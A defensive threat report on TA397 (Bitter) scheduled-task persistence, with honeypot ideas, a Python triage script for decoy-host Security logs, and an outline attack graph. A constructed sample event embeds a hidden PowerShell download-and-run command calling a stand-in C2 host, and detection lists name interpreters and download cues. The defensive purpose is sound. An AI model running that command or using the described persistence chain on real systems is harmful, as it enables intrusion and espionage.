Engage Report: TA397 RATs War

Subject: Engage Report: TA397 RATs War

Tactics: TA0003 Persistence

Technique: T1053.005 Scheduled Task/Job: Scheduled Task

Procedure:

TA397 utilizes a malicious shortcut (LNK) file embedded within a RAR archive. This LNK file, when activated, executes PowerShell code that creates a scheduled task on the victim’s machine. This scheduled task enables the download and execution of additional payloads, establishing persistence on the compromised system.

Vulnerability:

EAV0001: When adversaries interact with the environment or personas, they are vulnerable when they collect, observe, or manipulate system artifacts or information. Manipulated data may cause them to reveal behaviors, use additional or more advanced capabilities against the target, and/or impact their dwell time.

EAV0004: When adversaries use phishing emails to gain access to victim systems, they have no control over where a malicious attachment is detonated from, or where a link is clicked.

Engagement Opportunity:

Deploy a decoy system with a vulnerable configuration that allows for the creation of scheduled tasks. Monitor the decoy for attempts to create or modify scheduled tasks, indicating adversary activity. This provides an opportunity to observe T1053.005 in action and gather intelligence on the adversary’s tools, techniques, and procedures (TTPs).

Threat Actor: TA397 (also known as Bitter)

Threat Objective:

To establish persistence on the victim’s machine and deploy additional malware for espionage and intelligence gathering purposes.

Deception Opportunity:

Set up a honeypot with decoy files and folders that mimic those typically targeted by TA397. Monitor this honeypot for any unauthorized access attempts, especially those related to scheduled tasks and the execution of suspicious commands. This could reveal the adversary’s presence and their intended actions.
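One way to implement the monitoring called for in the Engagement Opportunity and the Deception Opportunity above, as an added example that is not part of this report or of MITRE Engage: a Python triage script that reads Security-log events exported from the decoy host and raises an alert when a scheduled task is registered or updated (Event ID 4698/4702) by anything other than OS maintenance, escalating when the task action launches a script interpreter or carries download or hidden-window cues, and when a lure file in a decoy folder is read (Event ID 4663). The decoy host name, user name, lure folders and every sample event are constructed; the field names are the ones the Windows Security log uses, and the export format assumed is the XML that `Get-WinEvent` returns from `.ToXml()`.

```python
"""Triage of Security-log events exported from a scheduled-task decoy.

Added example. Assumes the decoy exports events as the XML that
Get-WinEvent's .ToXml() returns, with scheduled-task auditing (Event IDs
4698/4702) and object-access auditing on the lure folders (Event ID 4663)
enabled. Host, user, folders and events below are constructed.
"""
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Lure folders seeded on the decoy (constructed); any read of them is an alert.
DECOY_PATHS = ("c:\\users\\jdoe\\documents\\passwords\\", "c:\\sharedfiles\\finance\\")
# Interpreters an OS maintenance task almost never launches; the TA397
# procedure on this page runs PowerShell from its task.
INTERPRETERS = ("powershell", "pwsh", "cmd.exe", "wscript", "cscript", "mshta", "rundll32", "regsvr32")
# Argument fragments typical of download-and-run or hidden execution.
SUSPICIOUS_ARGS = ("downloadstring", "downloadfile", "invoke-webrequest", "-encodedcommand",
                   " -enc ", "-windowstyle hidden", " -w hidden", "http://", "https://")

# Constructed sample events in Security-log XML layout (not from any real incident).
TASK_CREATED_BY_USER = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><EventID>4698</EventID><Computer>DECOY-WS01</Computer></System>
<EventData><Data Name="SubjectUserName">jdoe</Data><Data Name="TaskName">\WindowsUpdateCheck</Data>
<Data Name="TaskContent">&lt;Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"&gt;&lt;Actions&gt;&lt;Exec&gt;&lt;Command&gt;powershell.exe&lt;/Command&gt;&lt;Arguments&gt;-WindowStyle Hidden -c "IEX((New-Object Net.WebClient).DownloadString('http://c2.example.invalid/s'))"&lt;/Arguments&gt;&lt;/Exec&gt;&lt;/Actions&gt;&lt;/Task&gt;</Data>
</EventData></Event>"""
TASK_CREATED_BY_OS = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><EventID>4698</EventID><Computer>DECOY-WS01</Computer></System>
<EventData><Data Name="SubjectUserName">SYSTEM</Data><Data Name="TaskName">\Microsoft\Windows\Defrag\ScheduledDefrag</Data>
<Data Name="TaskContent">&lt;Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"&gt;&lt;Actions&gt;&lt;Exec&gt;&lt;Command&gt;%windir%\system32\defrag.exe&lt;/Command&gt;&lt;Arguments&gt;-c -h -o -$&lt;/Arguments&gt;&lt;/Exec&gt;&lt;/Actions&gt;&lt;/Task&gt;</Data>
</EventData></Event>"""
DECOY_FILE_READ = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><EventID>4663</EventID><Computer>DECOY-WS01</Computer></System>
<EventData><Data Name="SubjectUserName">jdoe</Data><Data Name="AccessMask">0x1</Data>
<Data Name="ObjectName">C:\Users\jdoe\Documents\Passwords\vpn_credentials.txt</Data>
<Data Name="ProcessName">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
</EventData></Event>"""


@dataclass
class Alert:
    severity: str
    event_id: int
    rule: str
    detail: str


def _local(tag: str) -> str:
    """Strip the XML namespace so tags can be compared by local name."""
    return tag.rsplit("}", 1)[-1]


def parse_event(xml_text: str) -> dict:
    """Flatten one event into {'EventID': int, 'Computer': str, <Data Name>: text}."""
    event = {}
    for el in ET.fromstring(xml_text).iter():
        name = _local(el.tag)
        if name == "EventID":
            event[name] = int(el.text)
        elif name == "Computer":
            event[name] = el.text
        elif name == "Data" and el.get("Name"):
            event[el.get("Name")] = el.text or ""  # ET already unescaped &lt; &gt;
    return event


def task_actions(task_content: str) -> list:
    """Return [(command, arguments), ...] from the task definition held in TaskContent."""
    actions = []
    for exec_el in ET.fromstring(task_content).iter():
        if _local(exec_el.tag) == "Exec":
            parts = {_local(c.tag): (c.text or "") for c in exec_el}
            actions.append((parts.get("Command", ""), parts.get("Arguments", "")))
    return actions


def is_expected_os_task(event: dict, actions: list) -> bool:
    """Cheap allow-list for OS maintenance tasks so they do not drown real alerts:
    SYSTEM, a \\Microsoft\\Windows\\ task name, and every command under %windir%."""
    if event.get("SubjectUserName") != "SYSTEM":
        return False
    if not event.get("TaskName", "").lower().startswith("\\microsoft\\windows\\"):
        return False
    return all(cmd.lower().startswith(("%windir%", "%systemroot%")) for cmd, _ in actions)


def triage(xml_events: list) -> list:
    """Apply the decoy rules to a batch of exported events and return the alerts raised."""
    alerts = []
    for xml_text in xml_events:
        ev = parse_event(xml_text)
        eid = ev.get("EventID")
        if eid in (4698, 4702):  # scheduled task created / updated
            actions = task_actions(ev.get("TaskContent", "<Task/>"))
            if is_expected_os_task(ev, actions):
                continue
            blob = " ".join(cmd + " " + args for cmd, args in actions).lower()
            hot = any(i in blob for i in INTERPRETERS) or any(s in blob for s in SUSPICIOUS_ARGS)
            alerts.append(Alert("high" if hot else "medium", eid, "scheduled task created on decoy",
                                f"{ev.get('SubjectUserName')} registered {ev.get('TaskName')} -> {actions}"))
        elif eid == 4663 and ev.get("ObjectName", "").lower().startswith(DECOY_PATHS):
            alerts.append(Alert("high", eid, "decoy file accessed",
                                f"{ev.get('ProcessName')} read {ev.get('ObjectName')} as {ev.get('SubjectUserName')}"))
    return alerts


if __name__ == "__main__":
    for a in triage([TASK_CREATED_BY_USER, TASK_CREATED_BY_OS, DECOY_FILE_READ]):
        print(f"[{a.severity}] {a.event_id} {a.rule}: {a.detail}")
```

On a decoy no legitimate administrator should be registering tasks, so every non-maintenance task creation is at least a medium alert and the interpreter and argument cues only decide whether it is escalated; the allow-list deliberately requires all three conditions (SYSTEM, a Microsoft task path, and a command under %windir%) because an adversary-created task rarely meets all of them at once. The 4663 rule depends on a SACL being set on the lure folders, otherwise the event is never written.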

Sensor Data Placement: User-Mode

Observable Level: Core to Some Implementations of (Sub-)Technique

Scoring Rationale:

The abuse of scheduled tasks for persistence is a prevalent technique employed by various threat actors, including TA397. While not all attacks rely on this method, it is common enough to be considered a core implementation of this sub-technique.

Link to Report:

Link to Report II.:

Additional Comments:

Monitoring scheduled task activity and implementing robust detection mechanisms for suspicious commands can significantly improve the security posture against threats like TA397.

Possible elements: Fake Windows System Files

MSG (Pseudocode):

# Malicious Sub-Graph Standard

# Node Format:
# [Node ID]: [Tactic] - [Technique] - [Procedure] ([Observable Level])

# Edge Format:
# [Source Node ID] --> [Destination Node ID] ([Exploited Vulnerability])

# Example: TA397 Attack Graph

[1]: Initial Access [TA0001] - Phishing [T1566]: Spearphishing Attachment [T1566.001] - Deliver malicious LNK file within a RAR archive (Core to Some Implementations of (Sub-)Technique)
[2]: Persistence [TA0003] - Scheduled Task/Job [T1053]: Scheduled Task [T1053.005] - Create scheduled task using PowerShell code embedded in the LNK file (Core to Some Implementations of (Sub-)Technique)
[3]: Command and Control [TA0011] - Application Layer Protocol [T1071]: Web Protocols [T1071.001] - Communicate with C2 server using HTTP (Lack of Network Monitoring)
[4]: Execution [TA0002] - Command and Scripting Interpreter [T1059]: Windows Command Shell [T1059.003] - Execute commands to download and run additional payloads (Lack of User Awareness)

1 --> 2
2 --> 3
3 --> 4

# Pseudocode Standard

# Function Format:
# function [Tactic]_[Technique]([Input]):
#     [Procedure]
#     return [Output]

# Example: TA397 Pseudocode

function Initial_Access_Phishing(target_email):
    # Craft phishing email with malicious RAR archive containing LNK file
    # Send email to target_email
    return malicious_lnk_file

function Persistence_Scheduled_Task_Job(malicious_lnk_file):
    # Execute PowerShell code from LNK file to create scheduled task
    return scheduled_task

function Command_and_Control_Application_Layer_Protocol(scheduled_task):
    # Use scheduled task to communicate with C2 server
    return commands

function Execution_Command_and_Scripting_Interpreter(commands):
    # Execute commands to download and run additional payloads
    return success
